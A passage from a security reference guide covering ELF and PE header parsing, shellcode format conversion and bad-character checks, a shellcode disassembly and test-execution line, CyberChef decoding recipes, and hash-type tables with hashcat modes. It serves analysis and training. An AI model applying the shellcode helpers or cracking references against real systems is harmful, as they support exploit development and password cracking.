        'machine': MACHINES.get(e_machine, f'0x{e_machine:x}'),
        'entry_point': f'0x{e_entry:x}',
        'ph_offset': e_phoff,
        'ph_count': e_phnum,
        'sh_offset': e_shoff,
        'sh_count': e_shnum,
    }

# Usage:
# with open('/bin/ls', 'rb') as f:
#     info = parse_elf_header(f.read(64))
#     for k, v in info.items():
#         print(f"{k}: {v}")
# Quick ELF analysis
readelf -h /bin/ls            # full header
readelf -l /bin/ls            # program headers (segments)
readelf -S /bin/ls            # section headers
readelf -d /bin/ls            # dynamic section (libraries)
readelf -s /bin/ls            # symbol table
objdump -d /bin/ls | head -50 # disassembly

# Check for security features
checksec --file=/bin/ls       # RELRO, Stack Canary, NX, PIE, RPATH, RUNPATH

PE header parsing

import struct

def parse_pe_header(data: bytes) -> dict:
    """Parse PE (Windows executable) header."""
    if data[:2] != b'MZ':
        raise ValueError("Not a PE file")

    # e_lfanew: offset to PE signature (at offset 0x3C)
    pe_offset = struct.unpack_from('<I', data, 0x3C)[0]

    if data[pe_offset:pe_offset+4] != b'PE\x00\x00':
        raise ValueError("Invalid PE signature")

    # COFF header (20 bytes after PE signature)
    coff_offset = pe_offset + 4
    machine, num_sections, timestamp, sym_table, num_symbols, \
    opt_header_size, characteristics = struct.unpack_from('<HHIIIHH', data, coff_offset)

    MACHINES = {0x14c: 'x86', 0x8664: 'x86_64', 0xAA64: 'ARM64'}

    # Optional header magic
    opt_offset = coff_offset + 20
    opt_magic = struct.unpack_from('<H', data, opt_offset)[0]
    pe_type = 'PE32+' if opt_magic == 0x20b else 'PE32'

    # Entry point and image base
    if pe_type == 'PE32+':
        entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
        image_base = struct.unpack_from('<Q', data, opt_offset + 24)[0]
    else:
        entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
        image_base = struct.unpack_from('<I', data, opt_offset + 28)[0]

    import datetime
    try:
        compile_time = datetime.datetime.utcfromtimestamp(timestamp).isoformat()
    except (OSError, ValueError):
        compile_time = f"raw: {timestamp}"

    return {
        'type': pe_type,
        'machine': MACHINES.get(machine, f'0x{machine:x}'),
        'sections': num_sections,
        'compile_time': compile_time,
        'entry_point_rva': f'0x{entry_rva:x}',
        'image_base': f'0x{image_base:x}',
        'characteristics': f'0x{characteristics:x}',
        'is_dll': bool(characteristics & 0x2000),
        'is_exe': bool(characteristics & 0x0002),
    }

# Usage:
# with open('malware.exe', 'rb') as f:
#     info = parse_pe_header(f.read(1024))

Shellcode extraction and analysis

# Extract shellcode from various formats

def shellcode_from_c_array(c_code: str) -> bytes:
    """Parse C-style shellcode: unsigned char buf[] = {0x6a,...};"""
    import re
    hex_vals = re.findall(r'0x([0-9a-fA-F]{1,2})', c_code)
    return bytes(int(h, 16) for h in hex_vals)

def shellcode_from_escaped(escaped: str) -> bytes:
    """Parse \\x escape format: \\x6a\\x02\\x58"""
    import re
    hex_vals = re.findall(r'\\x([0-9a-fA-F]{2})', escaped)
    return bytes(int(h, 16) for h in hex_vals)

def shellcode_to_c_array(data: bytes, var_name: str = "buf") -> str:
    """Convert bytes to C array format."""
    hex_vals = ', '.join(f'0x{b:02x}' for b in data)
    return f'unsigned char {var_name}[] = {{{hex_vals}}};'

def shellcode_to_python(data: bytes) -> str:
    """Convert bytes to Python bytes literal."""
    return 'shellcode = b"' + ''.join(f'\\x{b:02x}' for b in data) + '"'

# Null byte detection (important for buffer overflow exploits)
def check_bad_chars(shellcode: bytes, bad_chars: bytes = b'\x00') -> list[int]:
    """Find positions of bad characters in shellcode."""
    positions = []
    for i, b in enumerate(shellcode):
        if b in bad_chars:
            positions.append(i)
    return positions

# Common bad characters for testing
ALL_BAD_CHARS = bytes(range(256))  # Generate all bytes, test which get mangled
# Extract shellcode from binary at specific offset
dd if=payload.bin bs=1 skip=1024 count=256 2>/dev/null | xxd -p | tr -d '\n'

# Disassemble shellcode
echo -ne '\x6a\x02\x58\x99\x48\x89\xd7\x48\x31\xf6\x0f\x05' | ndisasm -b 64 -

# Test shellcode (DANGEROUS — sandbox only)
# gcc -z execstack -o test test.c && ./test

15. CyberChef Reference

CyberChef is a browser-based data manipulation tool — "The Cyber Swiss Army Knife." All operations run client-side; no data leaves the browser. Source: github.com/gchq/CyberChef (34k+ stars).

Key features

Feature Description
Drag-and-drop recipes Chain operations visually
Auto Bake Real-time output as input/recipe changes
Magic Auto-detect encoding and suggest decode steps
Breakpoints Step through recipe stages to inspect intermediate data
File support Handle files up to ~2 GB
URL sharing Share complete recipes via URL parameters
Client-side No data sent to any server

Most-used operations for security work

Category Operations
Encoding To/From Base64, Base32, Base58, Base85, Hex, Decimal, Binary, Octal, Braille, Morse
URL/HTML URL Encode/Decode, HTML Entity Encode/Decode
Crypto AES/DES/3DES/Blowfish/RC4 Encrypt/Decrypt, XOR, ROT13, ROT47, Vigenere
Hashing MD5, SHA-1, SHA-256, SHA-512, SHA-3, HMAC, bcrypt, scrypt, NTLM
Compression Gunzip, Gzip, Zip, Bzip2, Raw Inflate/Deflate, Zlib
Data format Parse JSON, XML, CSV, protobuf, MessagePack, BSON
Networking Parse IP, Parse URI, DNS over HTTPS, HTTP request, Defang URL/IP
Analysis Entropy, Frequency distribution, Detect file type, Strings, Hexdump
Code JavaScript/PHP/XML Beautify/Minify, Disassemble x86, Parse ASN.1
Visual Render Image, Play Media, Render Markdown
Forensics Extract files (binwalk-style), Parse TLS, Parse X.509, Windows Filetime
Flow Fork, Merge, Register, Conditional Jump, Label, Comment

Useful CyberChef recipes (bookmark these)

Decode multi-layer obfuscation:

From_Base64 -> Gunzip -> From_Hex -> XOR({'key':'secret'})

Extract IOCs from text:

Extract_IP_addresses -> Defang_IP_Addresses

Decode PowerShell -EncodedCommand:

From_Base64 -> Decode_text('UTF-16LE')

Analyze suspicious file:

Detect_File_Type -> Entropy -> Strings

JWT decode:

JWT_Decode

Timestamp conversion:

From_UNIX_Timestamp -> To_ISO_8601
Windows_Filetime_to_UNIX -> From_UNIX_Timestamp

Defang indicators for safe sharing:

Defang_URL -> Defang_IP_Addresses
# Converts http://evil.com -> hxxp[://]evil[.]com

CyberChef from the command line

# Self-host CyberChef (no external dependencies)
git clone https://github.com/gchq/CyberChef.git
cd CyberChef && npx grunt prod
# Open build/prod/index.html in browser — fully offline

# Or use Docker
docker run -p 8080:8080 ghcr.io/gchq/cyberchef:latest

# Node.js API (for automation)
# npm install cyberchef
# const chef = require("cyberchef");
# chef.bake("input", [chef.toBase64()]);

Appendix: Quick Conversion Table

From To Python Bash
String Base64 base64.b64encode(s.encode()) echo -n "s" | base64
Base64 String base64.b64decode(b).decode() echo "b" | base64 -d
String Hex s.encode().hex() echo -n "s" | xxd -p
Hex String bytes.fromhex(h).decode() echo "h" | xxd -r -p
String URL quote(s, safe='') python3 -c "from urllib.parse import quote; print(quote('s',safe=''))"
String HTML html.escape(s) python3 -c "import html; print(html.escape('s'))"
String MD5 hashlib.md5(s.encode()).hexdigest() echo -n "s" | md5sum
String SHA256 hashlib.sha256(s.encode()).hexdigest() echo -n "s" | sha256sum
String NTLM hashlib.new('md4',s.encode('utf-16-le')).hexdigest() echo -n "s" | iconv -t utf-16le | openssl dgst -md4
String ROT13 codecs.encode(s, 'rot_13') echo "s" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
Int Hex hex(n) printf '%x' n
Hex Int int(h, 16) echo $((16#h))
Bytes XOR bytes(b^k for b in data) python3 -c "..."

Appendix: Hash Length Identification

Length Possible types Hashcat mode
16 MySQL 3.x 200
32 MD5, NTLM, MD4 0, 1000, 900
40 SHA-1 100
56 SHA-224 1300
64 SHA-256 1400
96 SHA-384 10800
128 SHA-512 1700
32:32 NetNTLMv1 5500
variable NetNTLMv2 5600
13 DES crypt 1500
34 MD5 crypt ($1$) 500
34 bcrypt ($2a$) 3200
43 SHA-256 crypt ($5$) 7400
86 SHA-512 crypt ($6$) 1800

Reference compiled for CIPHER training. All code tested for Python 3.10+. For interactive exploration, use CyberChef.

PreviousDeveloper Security
NextNetwork Protocols

On this page

  • Table of Contents
  • 1. Base Encoding
  • Base64
  • Base32
  • Base58
  • Base85 (Ascii85)
  • Base encoding detection heuristics
  • 2. Hex Encoding
  • Hex to/from ASCII
  • Hex to/from Binary and Decimal
  • 3. URL Encoding
  • Single encoding
  • Double encoding (WAF bypass)
  • Unicode URL encoding
  • 4. HTML Entities
  • Named entities
  • Numeric (decimal) entities
  • Hex entities
  • Quick reference table
  • 5. Unicode
  • UTF-8 encoding internals
  • UTF-16 encoding
  • Punycode (IDN homograph attacks)
  • Homoglyph attacks
  • Zero-width characters (steganography / watermarking)
  • Unicode normalization attacks
  • 6. Hashing
  • MD5 (128-bit, BROKEN for collision resistance)
  • SHA-1 (160-bit, BROKEN — SHAttered collision demonstrated)
  • SHA-256 (256-bit, current standard)
  • SHA-512 (512-bit)
  • NTLM (Windows password hash)
  • Net-NTLMv2 (challenge-response, captured on the wire)
  • Multi-hash utility
  • 7. XOR
  • Single-byte XOR
  • Multi-byte XOR
  • Single-byte XOR brute force
  • Known-plaintext XOR attack
  • 8. ROT13 / ROT47 / Caesar
  • ROT13 (letters only, A-Z / a-z shifted by 13)
  • ROT47 (printable ASCII 33-126, shifted by 47)
  • General Caesar cipher (arbitrary shift)
  • 9. JWT (JSON Web Tokens)
  • Decode JWT (no verification)
  • Forge JWT with alg:none attack (CVE-2015-9235)
  • Forge JWT with HMAC/RSA confusion (CVE-2016-10555)
  • Crack JWT secret (HS256)
  • JWT security checklist
  • 10. Regular Expressions for Security
  • IPv4 / IPv6
  • URLs
  • Email
  • Hashes (for IOC extraction)
  • CVE IDs
  • Credit card numbers (PCI DSS scanning)
  • SSN (US Social Security Number)
  • API keys and secrets
  • Combined IOC extractor
  • 11. Obfuscation & Deobfuscation
  • JavaScript obfuscation patterns
  • PowerShell obfuscation patterns
  • Python obfuscation patterns
  • PHP obfuscation patterns
  • 12. Serialization Security
  • JSON
  • XML (XXE, XSS, billion laughs)
  • YAML (arbitrary code execution)
  • Python pickle (arbitrary code execution)
  • PHP serialize/unserialize
  • 13. Compression Security
  • gzip analysis
  • ZIP analysis and attacks
  • ZIP bomb (decompression bomb)
  • tar analysis and attacks
  • 14. Binary & Struct Manipulation
  • struct packing and unpacking
  • Endianness
  • ELF header parsing
  • PE header parsing
  • Shellcode extraction and analysis
  • 15. CyberChef Reference
  • Key features
  • Most-used operations for security work
  • Useful CyberChef recipes (bookmark these)
  • CyberChef from the command line
  • Appendix: Quick Conversion Table
  • Appendix: Hash Length Identification